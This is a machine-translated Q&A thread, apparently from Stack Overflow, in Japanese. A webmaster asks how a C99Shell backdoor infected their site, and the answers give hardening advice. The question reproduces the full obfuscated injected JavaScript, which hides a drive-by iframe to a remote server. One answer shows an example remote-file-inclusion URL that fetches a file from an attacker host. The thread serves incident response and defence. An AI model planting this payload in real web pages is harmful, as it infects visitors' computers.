9

私のウェブサイトはトロイの木馬のスクリプトに感染していました。

誰かが「x76x09.php」または「config.php」というファイルを作成/アップロードして、私のWebスペースのルートディレクトリに入れました。サイズは44287バイトで、MD5チェックサムは8dd76fc074b717fccfa30b86956992f8です。Virustotalを使用してこのファイルを分析しました。これらの結果は、「Backdoor/PHP.C99Shell」または「Trojan.Script.224490」であることを示しています。

このファイルは、作成されたのと同じ瞬間に実行されました。したがって、それは自動的に発生したに違いありません。このファイルは、私のWebスペースのすべてのindex.phpの最後に次の悪意のあるコードを追加しました。

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

そのコードが私のページに表示された後、ユーザーはFirefoxで青いパネルがポップアップすることを報告しました。プラグインをインストールするように依頼しました。現在、それらの一部はPC上にExploit.Java.CVE-2010-0886.aを持っています。

allow_url_fopenとallow_url_includeをオフにしましたが、感染は発生しました。そして私のホスティング業者は、ファイルがFTP経由でアップロードされなかったと言っています。

だから私の質問は:

  • 悪意のあるコードは何をしますか?どのようにエンコードされますか?
  • リモートファイル("x76x09.php"または"config.php")はどのようにして私のWebスペースに届きますか?SQLインジェクション?自分のPCでウイルス?
  • 将来、このような攻撃からWebサイトを保護するにはどうすればよいですか?

事前にどうもありがとうございました!本当に助けが必要です。

この質問も同様です。しかし、それはレポートのようなものです。最初からウイルスだとは知りませんでした。したがって、ここでのこの質問はウイルス自体に言及していますが、他の質問には言及していません。

4

3 に答える 3

7

私たちが確認したハッキン​​グされた Web サイトの多くは、感染した Web サイトにファイルを FTP 送信するために使用された PC 上のウイルスの結果です。このウイルスはさまざまな方法で FTP パスワードを盗みますが、主に 2 つの方法があります。

まず、FileZilla のような無料の FTP プログラムを使用している場合、これらのプログラムは保存されたログイン資格情報をプレーン テキスト ファイルに保存することを知っておく必要があります。ウイルスは簡単にこれらを見つけて読み取り、その情報をサーバーに送信します。サーバーは有効な資格情報を使用して FTP にログインし、特定のファイルを自分自身にコピーして感染させ、Web サイトに送り返します。多くの場合、これらの「バックドア」シェル スクリプトも Web サイトにコピーするため、FTP パスワードが変更された場合でもサイトに再感染する可能性があります。

このウイルスはまた、FTP トラフィックを「盗聴」します。FTP はユーザー名とパスワードを含むすべてのデータをプレーン テキストで送信するため、ウイルスはその方法でも情報を簡単に見たり盗んだりできます。

しかし、多くの場合、感染を引き起こすバックドアを確認した場合、それは通常、サイトのどこかにあるリモート ファイル インクルージョンの脆弱性が原因です。ハッカーは、バックドアの 1 つを指す URL をリクエスト文字列の末尾に追加しようと常に試みています。したがって、アクセス ログには次のようなものが表示される場合があります。

/path/folder/another/folder/file.php? http://www.hackerswebsite.com/id.txt ????

パス/フォルダーの文字列は、ここではデモンストレーションのみを目的としています。

場合によっては、そのコマンドが機能し、id.txt を目的の Web サイトにコピーして、ファイルを操作できるバックドア シェル スクリプトを作成できます。

すべてのパスワードを変更します - FTP、データベース、cPanel、またはその他の管理インターフェース。

すべての PC のウイルスをスキャンします。

SFTP に変更します。

すべてのフォルダで 755 のアクセス許可を確認し、すべてのファイルで 644 のアクセス許可を確認します。これが標準です。

SQL インジェクションの場合、感染はファイルの最後にはありません。コンテンツを生成するための SQL 呼び出しがある場所になります。

はい。今日のバックドアにより、攻撃者は、MySQL データが保存されている config.php ファイルを閲覧できます。

すべてのパスワードを変更します。

于 2010-08-05T23:25:22.980 に答える
6

あなたのウェブサイトはエクスプロイト コードを使用してハッキングされています。

  1. インストールした可能性のあるphpライブラリを含め、すべてを更新する必要があります。

  2. phpsecinfoを実行し、.htaccess または php.ini を変更して、すべての赤とできるだけ多くの黄色を削除します。

  3. Web ルート ( chmod 500 -R /var/www && chown www-root /var/www) のすべてのファイルとフォルダーから書き込み権限を削除します。chown は、php を実行しているユーザーでなければなりません<?php system('whoami');?>

  4. すべてのパスワードを変更し、可能であれば sftp または ftps を使用します。

  5. FILEPHP アプリケーションが使用する MySQL アカウントから権限を削除します。

于 2010-08-04T22:39:47.623 に答える
0

Web サイトのアップロード メカニズムが適切にフィルタリングされていない可能性があります。たとえば、プロフィール写真を使用できる場合、誰かが php ファイルをアップロードし、それを実行する方法を見つけて、あなたの Web サイトを制御できる可能性があります。

x76x09.php は無修正のディレクトリ ブラウザ/アップローダーであり、悪意のあるアップローダーが Web サイトを完全に制御できるようにします。

サーバーにファイルをアップロードするすべての方法を一時的に無効にし、すべてのファイル内の悪意のあるコードのすべてのインスタンスを削除してください。

于 2010-08-04T22:22:10.580 に答える